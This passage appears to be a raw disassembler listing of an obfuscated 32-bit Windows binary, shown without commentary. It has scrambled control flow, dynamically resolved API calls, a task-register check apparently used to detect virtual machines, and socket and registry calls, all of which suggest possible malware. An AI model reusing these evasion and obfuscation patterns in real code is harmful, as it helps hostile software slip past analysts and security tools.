push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B3B1C
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B1D5B: ; CODE XREF: sub_9B1D80-4B68�j
; sub_9B1D80-4AD5�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
push dword ptr [ebp-1Ch]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 20h
; END OF FUNCTION CHUNK FOR sub_9B1D80
; =============== S U B R O U T I N E =======================================
sub_9B1D80 proc near ; CODE XREF: sub_9B04A8+1A17�p
; sub_9B19D8+31B6�p ...
; FUNCTION CHUNK AT 009AAFDC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AB080 SIZE 00000047 BYTES
; FUNCTION CHUNK AT 009AB684 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AC220 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AC458 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AC764 SIZE 00000042 BYTES
; FUNCTION CHUNK AT 009AD20C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AD2A0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AD958 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009ADE34 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009AE2D8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009AE744 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AE918 SIZE 0000003B BYTES
; FUNCTION CHUNK AT 009AEA70 SIZE 0000003C BYTES
; FUNCTION CHUNK AT 009AF1CC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AF8D0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009AFCE8 SIZE 00000057 BYTES
; FUNCTION CHUNK AT 009B0208 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009B04DC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009B0CD4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B195C SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009B1D5B SIZE 00000025 BYTES
; FUNCTION CHUNK AT 009B1E30 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B1EDC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B2D74 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B3070 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 009B3930 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 009B3C2C SIZE 00000025 BYTES
; FUNCTION CHUNK AT 009B3CE4 SIZE 00000038 BYTES
; FUNCTION CHUNK AT 009B3EC4 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009B46A4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B4E98 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B52D0 SIZE 0000002D BYTES
; FUNCTION CHUNK AT 009B5354 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B56D0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B610C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B655C SIZE 00000014 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B971B
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov eax, 2050h
mov large fs:0, esp
sub esp, 8
call __alloca_probe
push dword_9B8788
pop eax
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov [ebp-18h], esp
mov [ebp-2044h], edx
push dword ptr [ebp+0Ch]
pop esi
mov edi, ecx
push dword ptr [ebp+1Ch]
pop eax
mov [ebp-2054h], eax
mov eax, [ebp+20h]
mov [ebp-2048h], eax
mov ebx, [ebp+24h]
mov [ebp-2040h], ebx
mov dword ptr [ebp-4], 0
mov dword ptr [eax], 0
or ebx, ebx
jz loc_9B3CF3
jmp loc_9B3CE4
sub_9B1D80 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B1E04: ; CODE XREF: sub_9AC6DC+786E�j
cmp dword_9BBD10, eax
jb loc_9B0051
jmp loc_9B003C
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B1E18: ; CODE XREF: sub_9B63D8-9E02�j
; sub_9B63D8-60C2�j
push dword ptr [ebp-2130h]
pop eax
cmp eax, 0FFFFFFFFh
jz loc_9AED08
jmp off_9BA374
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B1E30: ; CODE XREF: sub_9B1D80-1B72�j
mov edx, [ebp-2020h]
or edx, edx
jz loc_9B3ECB
jmp off_9BA940
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9B1E44: ; CODE XREF: sub_9B4FD0-623D�j
; DATA XREF: .text:off_9BA10F�o
mov edx, [ebp+14h]
cmp dword_9BBF84[eax], edx
jnz loc_9AB8C4
jmp off_9B8E16
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ebx, [ebp+0Ch]
; START OF FUNCTION CHUNK FOR sub_9ABC20
loc_9B1E69: ; CODE XREF: sub_9ABC20+1FE0�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; END OF FUNCTION CHUNK FOR sub_9ABC20
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B1E80: ; CODE XREF: sub_9B04A8-2A91�j
; DATA XREF: .text:off_9B8F5C�o
lea eax, [ebp-403Ch]
xor edi, edi
call sub_9AC128
push edi
lea eax, [ebp-4054h]
push eax
lea ecx, [ebp-201Ch]
push ecx
push esi
push 11h
push dword ptr [ebp+8]
pop edx
push edx
lea eax, [ebp-403Ch]
push eax
push dword ptr [ebp-4044h]
pop ecx
push ecx
lea ecx, [ebp-402Ch]
lea edx, [ebp-401Ch]
call sub_9B1D80
push dword ptr [ebp-4054h]
pop edi
test edi, edi
jz loc_9AFD43
jmp off_9BA911
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B1EDC: ; CODE XREF: sub_9B1D80-2BA6�j
; DATA XREF: .text:off_9B90D5�o
push dword ptr [ebp+14h]
pop ebx
cmp ebx, 6
jnz loc_9AEA70
jmp loc_9B3930
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B1EF0: ; CODE XREF: sub_9B0930+1C7F�j
push off_9B87D8
mov ecx, [eax]
push ecx
call esi
mov edx, dword_9BCB74
mov ecx, [edx]
mov [ecx+70h], eax
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
mov ecx, [eax+70h]
and ecx, ecx
jmp loc_9B60C0
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEDD0
loc_9B1F1C: ; CODE XREF: sub_9AEDD0-33D9�j
; DATA XREF: .text:off_9B8DC2�o
cmp dword_9BEC2C[eax], edi
jz loc_9AD3A8
jmp off_9BA891
; END OF FUNCTION CHUNK FOR sub_9AEDD0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B1F30: ; CODE XREF: sub_9B0930-4378�j
; DATA XREF: .text:off_9B88A6�o
push off_9BAED9
mov eax, [eax+14h]
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
push dword ptr [edx+14h]
pop ecx
mov [ecx+4], eax
mov edx, dword_9BCB74
mov eax, [edx+14h]
mov ecx, [eax+4]
or ecx, ecx
jz loc_9B23EF
jmp off_9BA7AC
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
sub_9B1F68 proc near ; DATA XREF: .text:off_9B8820�o
; FUNCTION CHUNK AT 009AB2B0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AB6E4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009ABDD4 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 009AC640 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 009ACD74 SIZE 0000003D BYTES
; FUNCTION CHUNK AT 009ACE54 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009ADDEC SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009AE04C SIZE 0000006B BYTES
; FUNCTION CHUNK AT 009AE84C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AFB58 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 009AFD68 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 009AFDC0 SIZE 00000054 BYTES
; FUNCTION CHUNK AT 009B01DB SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009B0C90 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009B0DD8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009B0E1C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B1480 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009B1ABC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B1CAC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B2640 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B274C SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009B403C SIZE 00000038 BYTES
; FUNCTION CHUNK AT 009B40B4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B4254 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B436C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B4840 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 009B4874 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009B4A64 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B586C SIZE 00000025 BYTES
; FUNCTION CHUNK AT 009B58E4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009B5AD3 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009B5EE0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B61C0 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 009B64E4 SIZE 0000001C BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B8CFB
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 3D0h
push dword_9B8788
pop eax
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov [ebp-18h], esp
mov eax, [ebp+8]
mov [ebp-54h], eax
mov esi, [eax+0Ch]
xor ebx, ebx
mov [ebp-38h], esi
mov ecx, 77h
sub eax, eax
mov [ebp-4], ebx
mov [ebp-3Ch], ebx
mov [ebp-250h], ebx
lea edi, [ebp-24Ch]
rep stosd
mov [ebp-30h], ebx
call sub_9A9F43
cmp eax, 0Ah
jg loc_9ACD74
jmp loc_9B0E1C
sub_9B1F68 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B6504
loc_9B1FE0: ; CODE XREF: sub_9B6504+3E�j
; DATA XREF: .text:off_9B8CB9�o
call sub_9A4FEF
loc_9B1FE5: ; CODE XREF: sub_9B6504+38�j
call sub_9A5238
test eax, eax
jz loc_9B1C93
jmp loc_9B5F40
; END OF FUNCTION CHUNK FOR sub_9B6504
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B1FF8: ; CODE XREF: sub_9B63D8-980C�j
cmp cl, 39h
jg loc_9AF944
jmp loc_9B612C
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2010 proc near ; CODE XREF: sub_9ACEE8:loc_9AE600�p
; sub_9B1F68:loc_9B40B4�p ...
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AE6CC SIZE 0000004D BYTES
; FUNCTION CHUNK AT 009B012F SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009B0664 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009B59B4 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BAF53
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
mov eax, dword_9BEBF8
and eax, eax
jz loc_9AE6CC
jmp loc_9B0664
sub_9B2010 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B2054: ; CODE XREF: sub_9B0930+42C1�j
; DATA XREF: .text:off_9BAB90�o
push dword ptr [eax+18h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9B92D5
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B2068: ; CODE XREF: sub_9B0930+5E2�j
; DATA XREF: .text:off_9BACE0�o
push off_9B977D
push dword ptr [eax]
pop ecx
push ecx
call esi
push dword_9BCB74
pop edx
mov ecx, [edx+10h]
mov [ecx+20h], eax
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop eax
push dword ptr [eax+20h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9B8904
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
loc_9B20A0: ; CODE XREF: .text:009AE66E�j
; DATA XREF: .text:off_9BAA05�o
cmp eax, 80000000h
jnb loc_9B4B10
jmp off_9B92D9
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B20B4: ; CODE XREF: sub_9B4950-F40�j
cmp dword_9BEC24[eax], ebx
jnz loc_9B3BE0
jmp loc_9B3BC8
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5FC0
loc_9B20C8: ; CODE XREF: sub_9B5FC0-5E9C�j
; DATA XREF: .text:off_9BAB56�o
lea ecx, [ebp+var_120]
push ecx
push 2
call sub_9B6078
add esp, 8
push dword_9BCB74
pop edx
mov eax, [edx+0Ch]
push 0
lea ecx, [ebp+var_128]
push ecx
push 0
push 20006h
push 0
push 0
push 0
lea edx, [ebp+var_120]
push edx
mov ecx, [ebp+var_124]
push ecx
call dword ptr [eax+24h]
test eax, eax
jnz loc_9B2D12
jmp loc_9B2CFC
; END OF FUNCTION CHUNK FOR sub_9B5FC0
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2118 proc near ; CODE XREF: StartAddress+D3�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 009AFA38 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B034B SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B0570 SIZE 0000007B BYTES
; FUNCTION CHUNK AT 009B2AE4 SIZE 00000012 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BACA4
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
sub esi, esi
mov [ebp+var_1C], esi
mov [ebp+var_4], esi
call sub_9B0930
test eax, eax
jz loc_9B034B
jmp off_9BA786
sub_9B2118 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2160 proc near ; CODE XREF: sub_9B3408:loc_9AF0B8�p
; sub_9B3D1C+37�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AF328 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009B03B4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B165A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B2434 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 009B59CC SIZE 00000024 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B8EB4
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
push ecx
pop ebx
mov [ebp+var_18], esp
sub edi, edi
mov [ebp+var_1C], edi
push 4Ch
pop eax
mov [ebp+var_4], edi
call sub_9AF3E8
mov esi, eax
mov [ebp+var_1C], esi
cmp esi, edi
jz loc_9B2440
jmp loc_9AF328
sub_9B2160 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B2F1C
loc_9B21B0: ; CODE XREF: sub_9B2F1C+C9�j
; DATA XREF: .text:off_9B9F7E�o
push dword ptr [ecx+4]
pop eax
mov [esi+0Ah], eax
mov dword ptr [ebp-1Ch], 0Eh
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop eax
movzx ecx, word ptr [ecx+2]
push ecx
call dword ptr [eax+28h]
mov [esi+0Eh], ax
mov eax, 10h
mov [ebp-1Ch], eax
loc_9B21DC: ; CODE XREF: sub_9B2F1C+C3�j
test bl, 10h
jz loc_9AF3D9
jmp off_9BA8F3
; END OF FUNCTION CHUNK FOR sub_9B2F1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9B21EC: ; CODE XREF: sub_9B03E8-4403�j
; DATA XREF: .text:off_9BAA7F�o
mov eax, dword_9BF380
or eax, 8
mov word ptr dword_9BF380, ax
loc_9B21FA: ; CODE XREF: sub_9B03E8-4409�j
mov al, [ebp-0B2h]
cmp al, 1
jnz loc_9AFF3C
jmp loc_9AFF2C
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9B2210: ; CODE XREF: sub_9ADDA4+2A1�j
push dword ptr [ebp+ecx*4-27Ch]
pop eax
cdq
add esi, eax
adc ebx, edx
inc ecx
jmp loc_9AE034
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B2224: ; CODE XREF: sub_9ADAC4+7204�j
; DATA XREF: .text:off_9BA15C�o
test al, 2
jnz loc_9AE6B5
jmp loc_9AF9FC
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B2234: ; CODE XREF: sub_9B63D8-6902�j
inc esi
mov [ebp-212Ch], esi
push dword ptr [ebp-2124h]
pop ebx
jmp loc_9ACB69
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B2248: ; CODE XREF: sub_9AB1A0+5EA7�j
push edi
call sub_9AFCA0
add esp, 4
test eax, eax
jnz loc_9AD309
jmp loc_9AD304
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9B2260: ; CODE XREF: sub_9ADDA4-1821�j
push ecx
pop eax
loc_9B2262: ; CODE XREF: sub_9ADDA4-1827�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B227C proc near ; CODE XREF: sub_9B4FD0-A08C�p
; sub_9B46CC-7DAC�p ...
; FUNCTION CHUNK AT 009ACB10 SIZE 00000022 BYTES
push dword_9BCB74
pop eax
mov ecx, [eax]
push esi
push off_9BAF9B
call dword ptr [ecx+18h]
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
call dword ptr [eax+30h]
push eax
pop ecx
mov edx, ecx
push dword_9BCB94
pop eax
sub edx, eax
mov eax, 10624DD3h
mul edx
push dword_9BCB90
pop eax
shr edx, 6
cmp edx, 0E10h
lea esi, [edx+eax]
jb loc_9ACB1C
jmp loc_9ACB10
sub_9B227C endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B29B0
loc_9B22D0: ; CODE XREF: sub_9B29B0+72�j
; DATA XREF: .text:off_9B901C�o
mov ecx, dword_9BCB74
push dword ptr [ecx]
pop edx
call dword ptr [edx+94h]
cmp eax, 0B7h
jnz loc_9B541B
jmp loc_9AE9CC
; END OF FUNCTION CHUNK FOR sub_9B29B0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B2F1C
loc_9B22F0: ; CODE XREF: sub_9B2F1C-54B8�j
mov esi, [ebp+30h]
push dword ptr [ebp+8]
pop edi
add edi, eax
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, edx
mov [ebp-1Ch], eax
push dword ptr [ebp+8]
pop esi
loc_9B2310: ; CODE XREF: sub_9B2F1C-399C�j
test bl, bl
jns loc_9AE695
jmp loc_9ABB74
; END OF FUNCTION CHUNK FOR sub_9B2F1C
; ---------------------------------------------------------------------------
align 10h
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9B2324: ; CODE XREF: sub_9ACEE8+1725�j
; DATA XREF: .text:off_9BABAC�o
call sub_9B227C
sub eax, [ebp-0BCh]
cmp eax, 258h
jbe loc_9B34B9
jmp loc_9B47C4
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3EFC
loc_9B2340: ; CODE XREF: sub_9B3EFC-633E�j
; DATA XREF: .text:off_9BAA3E�o
cmp ecx, 0FF000000h
jz loc_9AD6E0
jmp loc_9AE328
; END OF FUNCTION CHUNK FOR sub_9B3EFC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B562C
loc_9B2354: ; CODE XREF: sub_9B562C-64BE�j
; DATA XREF: .text:off_9B9EB0�o
cmp [ebp+var_12C], ebx
jz loc_9AE77C
jmp off_9BAAD0
; END OF FUNCTION CHUNK FOR sub_9B562C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B2368: ; CODE XREF: sub_9B0930+1630�j
; DATA XREF: .text:off_9BA7AC�o
push off_9B8E7D
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
push dword ptr [ecx+14h]
pop edx
mov [edx+8], eax
mov eax, dword_9BCB74
push dword ptr [eax+14h]
pop eax
mov ecx, [eax+8]
and ecx, ecx
jz short loc_9B23EF
jmp off_9B9624
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B2398: ; CODE XREF: sub_9B1A08+AF�j
push dword_9BCB74
pop ecx
push dword ptr [ecx+10h]
pop edx
push 11h
push 2
push 2
call dword ptr [edx+20h]
mov [ebp+var_41E4], eax
and eax, eax
jz loc_9B17C7
jmp off_9B9F6E
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B23C0: ; CODE XREF: sub_9B0930-33A7�j
push off_9B983C
mov eax, [eax]
push eax
call esi
mov ecx, dword_9BCB74
push dword ptr [ecx]
pop edx
mov [edx+2Ch], eax
mov eax, dword_9BCB74
push dword ptr [eax]
pop eax
mov ecx, [eax+2Ch]
test ecx, ecx
jz short loc_9B23EF
jmp loc_9B0630
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B23EF: ; CODE XREF: sub_9B0930-5B16�j
; sub_9B0930-5832�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-20h]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2E04
loc_9B240C: ; CODE XREF: sub_9B2E04-1D70�j
; sub_9B2E04+80�j
; DATA XREF: ...
push esi
xor edx, edx
call sub_9B5CDC
test eax, eax
jnz loc_9B504C
jmp loc_9B6160
; END OF FUNCTION CHUNK FOR sub_9B2E04
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B46CC
loc_9B2424: ; CODE XREF: sub_9B46CC-7D9F�j
cmp eax, 54A9D400h
jbe loc_9B2C05
jmp loc_9B2C00
; END OF FUNCTION CHUNK FOR sub_9B46CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B2160
loc_9B2434: ; CODE XREF: sub_9B2160-1DA0�j
; sub_9B2160-B00�j
; DATA XREF: ...
lea ecx, [ebp+var_1C]
call sub_9B5480
push [ebp+var_1C]
pop esi
loc_9B2440: ; CODE XREF: sub_9B2160-1DA6�j
; sub_9B2160+43�j
mov [ebp+var_4], 0FFFFFFFFh
push esi
pop eax
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B2160
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B245C: ; CODE XREF: sub_9B0930-2CBD�j
push off_9B9738
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop ecx
mov [ecx+18h], eax
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop eax
mov ecx, [eax+18h]
and ecx, ecx
jz loc_9B23EF
jmp loc_9B0EE4
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9B2490 proc near ; CODE XREF: sub_9B03E8+276F�p
var_4 = word ptr -4
push ecx
str [esp+4+var_4]
xor eax, eax
cmp [esp+4+var_4], 4000h
setz al
pop ecx
retn
sub_9B2490 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B174C
loc_9B24A4: ; CODE XREF: sub_9B174C+3DD6�j
; DATA XREF: .text:off_9B9A21�o
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BA97F
call dword ptr [ecx+18h]
push dword_9BBD30
pop eax
test eax, eax
jbe loc_9AB66B
jmp loc_9AB650
; END OF FUNCTION CHUNK FOR sub_9B174C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B24CC: ; CODE XREF: sub_9AC6DC+7392�j
cmp dword_9BBD10, eax
ja loc_9B6188
jmp loc_9B1568
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AB3B0
loc_9B24E0: ; CODE XREF: sub_9AB3B0+8873�j
; DATA XREF: .text:off_9B997C�o
mov edx, dword_9BA084
mov [edi], edx
mov eax, dword_9BA088
mov [edi+4], eax
mov cx, word_9BA08C
mov [edi+8], cx
mov dl, byte_9BA08E
mov [edi+0Ah], dl
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
push off_9B8ED2
call dword ptr [ecx+18h]
mov eax, off_9B97DD
call sub_9AD7A4
mov esi, eax
push dword_9BCB74
pop edx
mov eax, [edx]
push off_9B8ED2
call dword ptr [eax+1Ch]
mov eax, esi
xor edx, edx
mov ecx, 6
div ecx
mov edx, off_9BAD2C[edx*4]
mov eax, edx
loc_9B2549: ; CODE XREF: sub_9AB3B0+719E�j
mov cl, [edx]
inc edx
and cl, cl
jnz short loc_9B2549
jmp sub_9B27D8
; END OF FUNCTION CHUNK FOR sub_9AB3B0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4CF4
loc_9B2558: ; CODE XREF: sub_9B4CF4+76D�j
; DATA XREF: .text:off_9BABBF�o
push edx
pop esi
push eax
pop ecx
shr ecx, 2
rep movsd
push eax
pop ecx
and ecx, 3
rep movsb
push dword ptr [ebp+8]
pop ecx
loc_9B256C: ; CODE XREF: sub_9B4CF4+3D�j
cmp ecx, 3
jnz loc_9AFEC9
jmp off_9B9EED
